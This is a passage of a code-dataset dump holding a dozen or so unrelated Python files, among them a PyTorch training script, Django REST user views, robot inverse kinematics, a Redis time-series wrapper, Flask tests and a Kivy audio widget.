output_size,\n\t\t\t\t\t\t\tfinal_act=final_act,\n\t\t\t\t\t\t\tnum_layers=num_layers,\n\t\t\t\t\t\t\tuse_cuda=args.cuda,\n\t\t\t\t\t\t\tdropout_input=dropout_input,\n\t\t\t\t\t\t\tdropout_hidden=dropout_hidden,\n\t\t\t\t\t\t\tembedding_dim=embedding_dim,\n\t\t\t\t\t\t\tshared_embedding=shared_embedding\n\t\t\t\t\t\t\t)\n\n\t\t# init 
weight\n\t\t# See Balazs Hihasi(ICLR 2016), pg.7\n\t\t\n\t\tcount_parameters(network)\n\n\t\tinit_model(network)\n\n\t\toptimizer = Optimizer(network.parameters(),\n\t\t\t\t\t\t\t\t optimizer_type=optimizer_type,\n\t\t\t\t\t\t\t\t lr=lr,\n\t\t\t\t\t\t\t\t weight_decay=weight_decay,\n\t\t\t\t\t\t\t\t momentum=momentum,\n\t\t\t\t\t\t\t\t eps=eps)\n\n\t\t\n\t\t# c_weight_map = dict(collections.Counter(train_data.m_y_action))\n\t\t# c_weights = [0 for i in range(output_size)]\n\t\t# for c_i in range(1, output_size):\n\t\t# \tc_weights[c_i] = len(train_data.m_y_action)/c_weight_map[c_i]\n\n\t\tc_weights = None\n\t\t# print(\"c weights\", c_weights)\n\t\tloss_function = LossFunction(loss_type=loss_type, use_cuda=args.cuda)\n\n\t\ttrainer = Trainer(log, network,\n\t\t\t\t\t\t\t train_data=train_data_loader,\n\t\t\t\t\t\t\t eval_data=test_data_loader,\n\t\t\t\t\t\t\t optim=optimizer,\n\t\t\t\t\t\t\t use_cuda=args.cuda,\n\t\t\t\t\t\t\t loss_func=loss_function,\n\t\t\t\t\t\t\t topk = args.topk,\n\t\t\t\t\t\t\t input_size = input_size,\n\t\t\t\t\t\t\t sample_full_flag = \"sample\",\n\t\t\t\t\t\t\t args=args)\n\n\t\ttrainer.train(0, n_epochs - 1, batch_size)\n\n\telse:\n\t\tif args.load_model is not None:\n\t\t\tprint(\"Loading pre trained model from {}\".format(args.load_model))\n\t\t\tcheckpoint = torch.load(args.load_model)\n\t\t\tmodel = checkpoint[\"model\"]\n\t\t\tmodel.gru.flatten_parameters()\n\t\t\toptim = checkpoint[\"optim\"]\n\t\t\tloss_function = LossFunction(loss_type=loss_type, use_cuda=args.cuda)\n\t\t\tevaluation = Evaluation(model, loss_function, use_cuda=args.cuda)\n\t\t\tloss, recall, mrr = evaluation.eval(valid_data)\n\t\t\tprint(\"Final result: recall = {:.2f}, mrr = {:.2f}\".format(recall, mrr))\n\t\telse:\n\t\t\tprint(\"Pre trained model is None!\")\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"main_time.py","file_name":"main_time.py","file_ext":"py","file_size_in_byte":8988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612454725","text":"\"\"\"\nAuthor: Amit Lazar\nFileName: physical.py\nDescription: Wrappers for physical devices that need them.\n\"\"\"\nfrom Adafruit_LED_Backpack import SevenSegment\n\n\nclass Display(SevenSegment.SevenSegment):\n \"\"\"A wrapper of SevenSegment.SevenSegment class.\"\"\"\n\n def __init__(self, **kwargs):\n super(Display, self).__init__(**kwargs)\n self.begin()\n self.clear()\n self.dots = True\n self.write_display()\n\n def write_display(self):\n \"\"\"Write to the display.\n\n Write to the display. 
Required because\n        SevenSegment.SevenSegment.write_display() sometimes raises\n        IOError for no apparent reason, so retry a bounded number of\n        times instead of recursing without limit.\"\"\"\n        # bounded retry: the original recursive retry could recurse forever on a flaky bus\n        for _ in range(3):\n            try:\n                super(Display, self).write_display()\n                return\n            except IOError:\n                continue\n\n    def set_time(self, time):\n        \"\"\"Set the time on the display and the dots on/off as needed.\n\n        :param time: the time as (hour, minute)\n        :type time: (int, int) tuple\n        \"\"\"\n        hour, minutes = time\n        self.set_digit(0, hour / 10)\n        self.set_digit(1, hour % 10)\n        self.set_digit(2, minutes / 10)\n        self.set_digit(3, minutes % 10)\n        self.set_dots(self.dots)\n        self.write_display()\n\n    def set_dots(self, on):\n        \"\"\"Sets the dots on/off.\n\n        :param on: whether they should be on (True) or off\n        :type on: bool\n        \"\"\"\n        self.dots = on\n        for pos in xrange(4):\n            self.set_decimal(pos, on)\n        self.write_display()\n","sub_path":"physical.py","file_name":"physical.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"232860757","text":"import pickle\nimport numpy as np\nfrom utiles_classification import *\nfrom process_activation_maps import load_maps\n\n#Files\nmapconv1J_file='../maps/PHONIM_l_conv1_35maps_th0.001000.pkl'\nmapconv1F_file='../maps/BREF80_l_conv1_35maps_th0.500000.pkl'\n\n#Load data\nconv1J = load_maps(mapconv1J_file)\nconv1F = load_maps(mapconv1F_file)\nph = ['R']\ndics = [conv1J]\ncat = conv1J.keys()\nl_cartes = [25, 56, 114, 120]\na_ignorer = []\nn_folds = 5\ntype = 'c_inc'\n\nldaClassification(dics,ph,cat,l_cartes,a_ignorer,n_folds,type)\n\n","sub_path":"reseau/classificationLDA/classificationLDAunitaire.py","file_name":"classificationLDAunitaire.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"382730646","text":"from rest_framework import serializers as rest_serializers\n\nfrom geotrek.feedback import models as feedback_models\n\n\nclass ReportSerializer(rest_serializers.ModelSerializer):\n    class Meta:\n        model = feedback_models.Report\n        geo_field = 'geom'\n        id_field = 'id'\n","sub_path":"geotrek/feedback/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"388177151","text":"from rest_framework import status\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.generics import (CreateAPIView, DestroyAPIView,\n                                     RetrieveAPIView, UpdateAPIView)\nfrom rest_framework.permissions import AllowAny, IsAdminUser, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\n\nfrom api.models import User, UserProfile\nfrom api.permissions import IsOwnerOrReadOnly\nfrom api.user.serializers import (UserFKSerializer, UserLoginSerializer,\n                                  UserSerializer, UserUpdateSerializer)\n\nfrom .serializers import UserRegistrationSerializer\n\n\nclass AuthCheck(APIView):\n    permission_classes = (IsAuthenticated,)\n\n    def post(self, request):\n        return Response({'message': 'pass'}, status=status.HTTP_200_OK)\n\nclass AdminCheck(APIView):\n    permission_classes = (IsAdminUser,)\n\n    def post(self, request):\n        return Response({'message': 'pass'}, status=status.HTTP_200_OK)\n\n\nclass UserList(RetrieveAPIView):\n    permission_classes = (IsAdminUser,)\n\n    def get(self, request):\n        users = User.objects.all()\n        serializer = 
UserFKSerializer(users, many=True)\n return Response(serializer.data)\n\n\nclass UserListAny(RetrieveAPIView):\n permission_classes = (IsOwnerOrReadOnly,)\n\n def get(self, request, user_id):\n user = User.objects.get(id=user_id)\n serializer = UserFKSerializer(user)\n self.check_object_permissions(self.request, {'user': user.email})\n return Response(serializer.data)\n\n\nclass UserUpdate(UpdateAPIView):\n permission_classes = (IsAdminUser,)\n serializer_class = UserUpdateSerializer\n\n def put(self, request, user_id):\n user = User.objects.get(pk=user_id)\n profile = UserProfile.objects.get(user_id=user_id)\n profileSerializer = UserSerializer(\n profile, data={'first_name': request.data.get('profile').get('first_name'),\n 'last_name': request.data.get('profile').get('last_name'), 'phone_number': request.data.get('profile').get('phone_number'),\n 'age': request.data.get('profile').get('age'), 'gender': request.data.get('profile').get('gender')}, partial=True)\n profileSerializer.is_valid(raise_exception=True)\n profileSerializer.save()\n if request.data.get('password'):\n serializer = self.serializer_class(\n user, data={'email': request.data.get('email'), 'password': request.data.get('password')}, partial=True)\n else:\n serializer = self.serializer_class(\n user, data={'email': request.data.get('email')}, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({'success': 'Updated Successfully!', 'data': serializer.data}, status=status.HTTP_200_OK)\n\n\nclass UserDelete(DestroyAPIView):\n permission_classes = (IsAdminUser,)\n\n def delete(self, _, user_id):\n user = User.objects.get(pk=user_id)\n user.delete()\n return Response({'success': 'Deleted Successfully!'}, status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserRegistrationView(CreateAPIView):\n\n permission_classes = (IsAdminUser,)\n serializer_class = UserRegistrationSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n status_code = status.HTTP_201_CREATED\n response = {\n 'success': 'True',\n 'status': status_code,\n 'message': 'User registered successfully!'\n }\n\n return Response(response, status=status_code)\n\n\nclass UserLoginView(RetrieveAPIView):\n\n serializer_class = UserLoginSerializer\n permission_classes = (AllowAny,)\n\n def post(self, request):\n try:\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n response = {\n 'success': 'True',\n 'status': status.HTTP_200_OK,\n 'message': 'User logged in successfully!',\n 'token': serializer.data['token']\n }\n status_code = status.HTTP_200_OK\n except Exception as e:\n response = {\n 'success': 'False',\n 'status': status.HTTP_401_UNAUTHORIZED,\n 'message': 'Username and password do not match!',\n 'token': ''\n }\n status_code = status.HTTP_401_UNAUTHORIZED\n\n return Response(response, status=status_code)\n\n\n# User Profile View\nclass UserProfileView(RetrieveAPIView):\n\n permission_classes = (IsAuthenticated,)\n authentication_class = JSONWebTokenAuthentication\n\n def get(self, request):\n try:\n user_profile = UserProfile.objects.get(user=request.user)\n status_code = status.HTTP_200_OK\n response = {\n 'success': 'True',\n 'status': status_code,\n 'message': 'User profile fetched successfully!',\n 'data': [\n {\n 'first_name': user_profile.first_name,\n 'last_name': user_profile.last_name,\n 'phone_number': user_profile.phone_number,\n 'age': user_profile.age,\n 
'gender': user_profile.gender\n }\n ]\n }\n except Exception as e:\n status_code = status.HTTP_400_BAD_REQUEST\n response = {\n 'success': 'False',\n 'status': status_code,\n 'message': 'User does not exists!',\n 'error': str(e)\n }\n return Response(response, status=status_code)\n","sub_path":"api/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"400310711","text":"import numpy as np\nfrom sympy import *\n\nd1 = 300\nd5 = 72\na2 = 250\na3 = 160\na4 = 117\nphi = np.deg2rad(-90)\n\ndef get_max_reach(p_z, phi):\n pw_z = p_z - d1 - ((d5 + a4) * np.sin(phi))\n theta = np.arcsin(pw_z / (a2 + a3))\n phi = np.deg2rad(phi)\n print(np.rad2deg(theta))\n print(np.rad2deg(phi - theta))\n return ((a2 + a3) * np.cos(theta)) + ((d5 + a4) * np.cos(phi - theta))\n\n\ndef compute_coordinates(joint_variables):\n\n q1 = joint_variables[0]\n q2 = joint_variables[1]\n q3 = joint_variables[2]\n q4 = joint_variables[3]\n \n x = ((a2 * np.cos(q2)) + (a3 * np.cos(q2 + q3)) + ((d5 + a4) * np.cos(q2 + q3 + q4))) * np.sin(q1)\n y = ((a2 * np.cos(q2)) + (a3 * np.cos(q2 + q3)) + ((d5 + a4) * np.cos(q2 + q3 + q4))) * np.cos(q1)\n z = ((a2 * np.sin(q2)) + (a3 * np.sin(q2 + q3)) + ((d5 + a4) * np.sin(q2 + q3 + q4))) + d1\n\n print(\"x: {}\\ty: {}\\tz: {}\".format(x, y, z))\n\n\ndef inverse_kinematics(p_x, p_y, p_z, phi = -90):\n\n phi = np.deg2rad(phi)\n\n while (1):\n q1 = -np.arctan2(p_x, p_y)\n\n pw_xy = np.sqrt(p_x ** 2 + p_y ** 2) - ((d5 + a4) * np.cos(phi))\n pw_z = p_z - d1 - ((d5 + a4) * np.sin(phi))\n\n k = (pw_xy ** 2 + pw_z ** 2 + a2 ** 2 - a3 ** 2) / (2 * a2)\n r = np.sqrt(pw_xy ** 2 + pw_z ** 2)\n p = np.arctan(pw_z / pw_xy)\n q2 = np.arccos (k / r) + p\n\n c3 = (pw_xy ** 2 + pw_z ** 2 - a2 ** 2 - a3 ** 2) / (2 * a2 * a3)\n s3 = np.sqrt(1 - c3 ** 2)\n #q3 = -np.arctan2(s3, c3)\n q3 = -np.arccos(c3)\n\n q4 = phi - q2 - q3\n\n q5 = 0\n\n if (np.rad2deg(q2) < -30 or np.rad2deg(q2) > 100 or np.rad2deg(q3) > 0 or np.rad2deg(q3) < -110 or np.rad2deg(q4) > 90 or np.rad2deg(q4) < -90 or np.isnan(q2) or np.isnan(q3) or np.isnan(q4)):\n joint_variables = -1\n phi += np.deg2rad(1)\n if phi > 0:\n break\n else:\n joint_variables = [q1, q2, q3, q4, q5]\n break\n\n if (joint_variables == -1):\n print(\"Inverse Kinematics Error.\")\n exit()\n\n return joint_variables, phi\n\ndef gripper_orientation(circle, nearest_circle):\n\n prev_theta = np.deg2rad(90)\n learning_rate = 0.30\n epoch = 100\n\n theta_gd = []\n cost_gd = []\n\n r1 = 25\n x = Symbol('x')\n\n gripper_cost_fcn = (1 / ((r1 * cos(x) - (nearest_circle[0] - circle[0])) ** 2 + (r1 * sin(x) - (nearest_circle[1] - circle[1])) ** 2))\n gripper_cost_fcn_der = gripper_cost_fcn.diff(x)\n\n gripper_cost_fcn = lambdify(x, gripper_cost_fcn)\n gripper_cost_fcn_der = lambdify(x, gripper_cost_fcn_der)\n\n theta_gd.append(prev_theta)\n cost_gd.append(gripper_cost_fcn(prev_theta))\n\n for i in range(epoch):\n #theta = prev_theta - learning_rate * gripper_cost_fcn_der(prev_theta, circle[0], circle[1], nearest_circle[0], nearest_circle[1])\n theta = prev_theta - learning_rate * gripper_cost_fcn_der(prev_theta)\n theta_gd.append(theta)\n #cost_gd.append(gripper_cost_fcn(theta, circle[0], circle[1], nearest_circle[0], nearest_circle[1]))\n cost_gd.append(gripper_cost_fcn(theta))\n\n prev_theta = theta\n\n #theta = np.arctan2(nearest_circle[1] - circle[1], nearest_circle[0] - circle[0])\n theta = np.arctan((nearest_circle[1] - circle[1]) / 
(nearest_circle[0] - circle[0]))\n \n q5 = theta_gd[epoch - 1] + theta\n\n return q5\n","sub_path":"ee236/project3/rvm1_ik.py","file_name":"rvm1_ik.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"523303166","text":"import string\n\ndef alphabet_position(letter):\n letter = letter.lower()\n position = string.ascii_lowercase.index(letter)\n return position\n\ndef rotate_character(char, rot):\n if char not in string.ascii_letters:\n new_character = char\n elif char in string.ascii_lowercase:\n position = alphabet_position(char)\n new_index = (position + int(rot)) % 26\n new_character = string.ascii_lowercase[new_index]\n else:\n position = alphabet_position(char)\n new_index = (position + int(rot)) % 26\n new_character = string.ascii_uppercase[new_index]\n return new_character\n","sub_path":"crypto/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"381061141","text":"import sys\nimport os\nimport math\nimport itertools\nimport numpy as np\n\nARG1 = int(sys.argv[1]) # geometry, 36 options\nARG2 = int(sys.argv[2]) # tauRef, 23 options\nARG3 = int(sys.argv[3]) # freqs, infinite options\n\nimport planetengine\nplanetengine.set_global_anchor(os.path.basename(__file__)[:-3], '.')\n\nfrom planetengine.systems import Viscoplastic as System\nfrom planetengine.initials import Sinusoidal\ninitial = Sinusoidal(freq = ARG3)\nfinal = (planetengine.finals.Averages, {'tolerance': 1e-3, 'minlength': 50})\n\ninputs = dict()\ninputs['f'], inputs['aspect'] = list(itertools.product(\n np.linspace(0.5, 1.0, 6),\n [round(2. ** (i / 2), 3) for i in range(2)],\n ))[ARG1]\ninputs['tauRef'] = [float(v) for v in 10. 
** np.linspace(4.95, 6.05, 23)][ARG2]\n\nsystem = System(\n alpha = 1e7,\n res = 64,\n observers = True,\n temperatureField = initial,\n innerMethod = 'lu',\n courant = 1.,\n **inputs\n )\n\nsystem[:final:100]()\n","sub_path":"production/plasticfreq.py","file_name":"plasticfreq.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570504597","text":"from flask import *\n\n\nimport unittest\nimport sys\nimport json\nsys.path.insert(0, '../')\n\nfrom app import *\n\n\nclass TestApp(unittest.TestCase):\n def setUp(self):\n TESTING = True\n WTF_CSRF_ENABLED = False\n\n SQLALCHEMY_DATABASE_URI = 'sqlite:///:memory:' \n self.app = app.test_client()\n \n\n self.headers = {'Content-type': 'application/json'}\n self.json_data = { \"from\": \"test@test.com\",\n \"from_name\": \"test\",\n \"to\": \"test@test.com\",\n \"to_name\": \"test\",\n \"subject\": \"test\",\n \"body\": \"test\"}\n \n \n\n def test_email(self):\n response = self.app.post('/email', data = json.dumps(self.json_data))\n \n self.assertTrue(response.status_code == 415, msg=None)\n \n response = self.app.post('/email', data = json.dumps({}), headers=self.headers)\n self.assertTrue(response.status_code == 500, msg=None)\n \n response = self.app.post('/email', data = json.dumps(self.json_data), headers=self.headers)\n self.assertTrue(response.status_code == 200, msg=None)\n\n def test_email_post_query(self):\n response = self.app.get('/query_email_post?from_name=test')\n self.assertTrue(response.status_code == 200, msg=None)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"tests/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"354103007","text":"import logging\n\nimport redis\nfrom kairos import Timeseries\n\n__all__ = ['RedisTimeSeries']\n\n\nclass RedisTimeSeries:\n\n def __init__(self, **kwargs):\n self.client = None\n try:\n self.client = redis.StrictRedis(host=kwargs['host'], port=kwargs['port'], db=kwargs['db'])\n self.client.ping()\n logging.debug('Redis host=%s,port=%s,db=%d- Connected!', kwargs['host'], kwargs['port'], kwargs['db'])\n except Exception as ex:\n self.client = None\n logging.error(\"Redis host=%s,port=%s,db=%d- Error %s\", ex, kwargs['host'], kwargs['port'], kwargs['db'])\n pass\n\n self.ts = None\n if self.client is not None:\n logging.debug('Timeseries - Create')\n if 'timeseries' in kwargs:\n self.ts = Timeseries(self.client, type='gauge', intervals=kwargs['timeseries'])\n else:\n self.ts = Timeseries(self.client, type='gauge', intervals={\n 'seconds': {\n 'step': 5, # 5 seconds\n 'steps': 120, # last 10 minutes\n 'read_cast': float,\n }\n }\n )\n\n def record_hit(self, key, measurement):\n if self.client:\n self.ts.insert(str(key), float(measurement))\n\n def record_response_time(self, content_id, measurement):\n self.record_hit(str(content_id) + ':rt', float(measurement))\n\n def record_status(self, content_id, measurement):\n self.record_hit(str(content_id) + ':status', float(measurement))\n\n def get_timeseries(self, key):\n if self.client is not None:\n # logging.info(\"properties: %s\", str(self.ts.properties(str(content_id) + ':' + str(monitor_id))) )\n return self.ts.series(str(key), 'seconds')\n\n return None\n\n def get_response_time_timeseries(self, content_id):\n # logging.info(\"properties: %s\", str(self.ts.properties(str(content_id) + ':' + 
str(monitor_id))) )\n return self.get_timeseries(str(content_id) + ':rt')\n\n def get_status_timeseries(self, content_id):\n # logging.info(\"properties: %s\", str(self.ts.properties(str(content_id) + ':' + str(monitor_id))) )\n return self.get_timeseries(str(content_id) + ':status')\n\n def get_timeseries_avg(self, key):\n # logging.info(\"properties: %s\", str(self.ts.properties(str(content_id) + ':' + str(monitor_id))) )\n series = []\n avg = 0.0\n if self.client is not None:\n series = self.ts.series(str(key), 'seconds')\n\n summ = 0.0\n count = 0.0\n for key, value in series.items():\n if value:\n summ += float(value)\n count += 1.0\n\n if count > 0.0:\n avg = summ / count\n\n logging.debug('serie avg: %f', avg)\n return avg\n\n def get_response_time_avg(self, content_id):\n return self.get_timeseries_avg(str(content_id) + ':rt')\n","sub_path":"src/powergslb/database/redis/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"543438619","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 24 17:33:48 2018\r\n\r\n@author: Henk\r\n\"\"\"\r\n\r\nimport scipy as np\r\nimport scipy.linalg as la\r\nimport pickle\r\nfrom rbf_data import netRBF\r\n#from simnet import simnet\r\n#from simnet_old import simnet\r\n#from plot_struct import plot_struct\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n#from matplotlib.colors import LightSource\r\n\r\n#np.set_printoptions(precision=2)\r\n\r\nplt.close('all')\r\nbbox_props = dict(boxstyle=\"square,pad=0.9\", alpha=1, fc=\"w\", ec=\"k\", lw=2)\r\n\r\n#np.random.seed(0)\r\n#random_state = np.random.get_state()\r\n#np.random.set_state(random_state)\r\n\r\n# =============================================================================\r\n# Load data from state estimation\r\n# =============================================================================\r\n\r\nwith open('data.pickle', 'rb') as file:\r\n state_estimation = pickle.load(file)\r\n\r\nX = state_estimation['z_pred']\r\nY = state_estimation['c_m']\r\nT = state_estimation['T']\r\n\r\nmod_list = state_estimation['mod_list']\r\nmod_data = state_estimation['mod_data']\r\nmod_time = state_estimation['mod_time']\r\nmod_out = state_estimation['mod_out']\r\n\r\nval_data = state_estimation['val_data']\r\nval_time = state_estimation['val_time']\r\n\r\n\r\nm = np.size(X,0) # number of states\r\nN = np.size(X,1) # number of measurements\r\nmeas_list = range(N) # list of measurement indices\r\n\r\nx1 = mod_data[0]\r\nx2 = mod_data[1]\r\n\r\nbias = netRBF.biases\r\nbiases = np.ones((1,len(x1)))\r\nXeval = np.row_stack((x1, x2, biases)) if bias else np.row_stack((x1, x2))\r\n\r\n\r\n#netRBF.NhidL = 1\r\nif netRBF.NhidL == 1:\r\n if not netRBF.distr:\r\n center_x = np.linspace(min(x1), max(x1), 4)\r\n center_y = np.linspace(min(x2), max(x2), 4)\r\n centersx, centersy = np.meshgrid(center_x, center_y)\r\n size_centers = np.size(centersx)\r\n centersx = np.reshape(centersx, (np.size(centersx)))\r\n centersy = np.reshape(centersy, (np.size(centersy)))\r\n \r\n netRBF.centers = np.zeros((3, size_centers)) if bias else np.zeros((2, size_centers))\r\n\r\n netRBF.Nhid = size_centers\r\n netRBF.NhidB = (size_centers+1) if bias else size_centers\r\n \r\n netRBF.centers[0] = centersx\r\n netRBF.centers[1] = centersy\r\n if bias:\r\n netRBF.centers[2] = np.ones((size_centers)) \r\n\r\n elif netRBF.distr == 
'smart':\r\n        netRBF.centers[0] = centersx\r\n        netRBF.centers[1] = centersy\r\n\r\nelse:\r\n    print(\"This layer amount is not implemented. Please choose between {}.\".format(\"1 and 2\"))\r\n\r\n#plt.show(plt.scatter(centersx, centersy)) # plot of the locations of the RBFs\r\n# =============================================================================\r\n# Try X times, then rerun with the best result, and show that\r\n# =============================================================================\r\n\r\nnetRBF.IW = np.ones((netRBF.NinB, netRBF.NhidB))\r\nnetRBF.OW = np.ones((netRBF.NhidB, netRBF.Nout))\r\n\r\nA = np.zeros((len(mod_out),size_centers))\r\n\r\n#i = number of measurements\r\n#j = number of neurons\r\n#k = number of input dimensions\r\n\r\nfor j in range(size_centers):\r\n    for i in range(len(mod_out)):\r\n        x_i = mod_data[0:2,[i]]\r\n        nu_ij = la.norm((netRBF.IW[:,[j]])**2 * (x_i - netRBF.centers[:,[j]])**2)\r\n        A[i,j] = np.exp(-nu_ij)\r\n\r\nnetRBF.OW = np.linalg.inv(A.T.dot(A)).dot(A.T).dot(mod_out)\r\n\r\nOutput = A.dot(netRBF.OW)\r\n\r\nprint(\"RMS: {:6f}\".format(np.sqrt(np.sum((Output - mod_out)**2)/len(mod_out))))\r\n\r\n#==============================================================================\r\n# Plotting\r\n#==============================================================================\r\n\r\ndo_plot = 1\r\nanimate = 0 #enable this to get a rotating animation\r\n\r\nif do_plot:\r\n    TRI = mpl.tri.Triangulation(Xeval[0], Xeval[1])\r\n    mask = mpl.tri.TriAnalyzer(TRI).get_flat_tri_mask(0.01)\r\n    \r\n    fig = plt.figure()\r\n    ax = fig.add_subplot(111, projection='3d')\r\n    ax.view_init(90,0)\r\n#    ax.set_proj_type('ortho')\r\n    ax.plot_trisurf(Xeval[0], Xeval[1], Output, mask=mask, cmap=mpl.cm.jet, linewidth=0.2)\r\n#    ax.scatter(X[0], X[1], Y, c='k', marker='.', linewidths=0.1)\r\n#    ax.scatter(centersx, centersy, -0.06, c='k') # plots the RBF centers\r\n    ax.set_xlabel(r'$\\alpha$')\r\n    ax.set_ylabel(r'$\\beta$')\r\n    ax.set_zlabel(r'$C_m$')\r\n\r\n    if animate:\r\n        for angle in range(0, 360):\r\n            ax.view_init(30, angle)\r\n            plt.draw()\r\n            plt.pause(.001)\r\n    else:\r\n        plt.show()\r\n","sub_path":"lin_regr.py","file_name":"lin_regr.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"642170462","text":"from app import db, models\nfrom flask_restful import Resource, Api, reqparse, abort\n\n# initialize the request argument parser\nparse = reqparse.RequestParser()\nparse.add_argument('name')\nparse.add_argument('introduce')\nparse.add_argument('picture')\n\n\nclass extend(Resource):\n    # query extend info\n    def get(self, id):\n\n        # check whether the whole extend list is requested\n        if (id == 0):\n            l = []\n            extends = models.extend.query.all()\n            # check whether the extend list is empty\n            if extends:\n                for item in extends:\n                    l.append({\n                        \"id\": item.id,\n                        \"name\": item.name,\n                        \"introduce\": item.introduce,\n                        \"picture\": item.picture\n                    })\n                d = {}\n                d[\"list\"] = l\n                return d, 200\n            else:\n                # abort() raises, so wrapping it in a returned set was dead code\n                abort(404, message=\"{} doesn't exist\".format(id))\n\n        extend = models.extend.query.get(id)\n        # check whether the extend exists\n        if extend:\n            return {\n                \"id\": extend.id,\n                \"name\": extend.name,\n                \"introduce\": extend.introduce,\n                \"picture\": extend.picture,\n            }, 200\n        else:\n            abort(404, message=\"{} doesn't exist\".format(id))\n\n    # add extend info\n    def post(self, id):\n        # # check whether the extend already exists\n        # if models.extend.query.get(id):\n        #     abort(400, message=\"{} existed\".format(id))\n\n        # find the largest existing id\n        max = models.extend.query.order_by(db.desc(models.extend.id)).first()\n        id = max.id + 1 if max else 1\n        # create the extend\n        extend = models.extend()\n        extend.id = id\n        args = parse.parse_args()\n        # copy the request arguments into the extend\n        extend.name = args.name\n        extend.introduce = args.introduce\n        extend.picture = args.picture\n        # store the extend in the database\n        try:\n            db.session.add(extend)\n            db.session.commit()\n            return {\"message\": True}\n        except Exception as e:\n            db.session.rollback()\n            abort(500)\n\n    # update the extend\n    def put(self, id):\n        extend = models.extend.query.get(id)\n        args = parse.parse_args()\n        # check whether the extend exists\n        if extend:\n            extend.name = args.name if args.name else extend.name\n            extend.introduce = args.introduce if args.introduce else extend.introduce\n            extend.picture = args.picture if args.picture else extend.picture\n            db.session.commit()\n            return {\"message\": True}\n        else:\n            abort(404, message=\"{} doesn't exist\".format(id))\n\n    # delete the extend\n    def delete(self, id):\n        extend = models.extend.query.get(id)\n        # check whether the extend exists\n        if extend:\n            try:\n                db.session.delete(extend)\n                db.session.commit()\n                return {\"message\": True}\n            except Exception as e:\n                db.session.rollback()\n                abort(500)\n        else:\n            abort(404, message=\"{} doesn't exist\".format(id))","sub_path":"server/app/json/extend.py","file_name":"extend.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"325380586","text":"from kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.spinner import Spinner\nfrom kivy.uix.tabbedpanel import TabbedPanel, TabbedPanelHeader\nfrom kivy.uix.button import Button\n\nfrom pyaudio import PyAudio\n\n\nclass AfInputDevice(GridLayout):\n    def __init__(self, **kwargs):\n        self.rows = 1\n        self.cols = 1\n        GridLayout.__init__(self, **kwargs)\n        self.topLayout=BoxLayout(orientation = \"vertical\")\n        self.add_widget(self.topLayout)\n        self.topLayout.add_widget(Label(text='tjosan'))\n\nclass AfInputManager(GridLayout):\n    def __init__(self, **kwargs):\n        self.rows = 2\n        self.cols = 1\n        GridLayout.__init__(self, **kwargs)\n\n        self.mainPanel = TabbedPanel()\n        self.mainPanel.default_tab_content = AfInputDevice()\n        print(\"WIDTH\", self.width)\n        self.mainPanel.default_tab_text = \"Default Input\"\n        self.add_widget(self.mainPanel)\n        self.add_widget(Button(text=\"Add new\"))\n\n\n\nclass AfWidget(GridLayout):\n    def __init__(self, **kwargs):\n        self.p = PyAudio()\n        self.rows = 1\n        self.cols = 1\n        GridLayout.__init__(self, **kwargs)\n\n        self.mainPanel = TabbedPanel()\n        print(\"WIDTH\", self.width)\n        self.mainPanel.default_tab_text = \"AF Output Devices\"\n\n        self.add_widget(self.mainPanel)\n        self.inputPanel = TabbedPanelHeader(text=\"AF Input Devices\")\n        self.inputPanel.content = AfInputManager()\n        self.mainPanel.add_widget(self.inputPanel)\n        self.mainPanel.tab_width = 200\n        #topLayout = BoxLayout(orientation = \"vertical\")\n        \n        #topLayout.add_widget(Label(text=\"Input device\", ))\n        #self.inputDevs = Spinner(text = \"Select input\")\n        #topLayout.add_widget(self.inputDevs)\n        \n        #topLayout.add_widget(Label(text=\"Output device\", ))\n        #self.outputDevs = Spinner(text = \"Select output\")\n        #topLayout.add_widget(self.outputDevs)\n        \n        #self.updateSoundDevices()\n        #self.add_widget(topLayout)\n\n    def updateSoundDevices(self):\n        api_cnt = self.p.get_host_api_count()\n        dev_cnt = self.p.get_device_count()\n        inputs = []\n        outputs = []\n        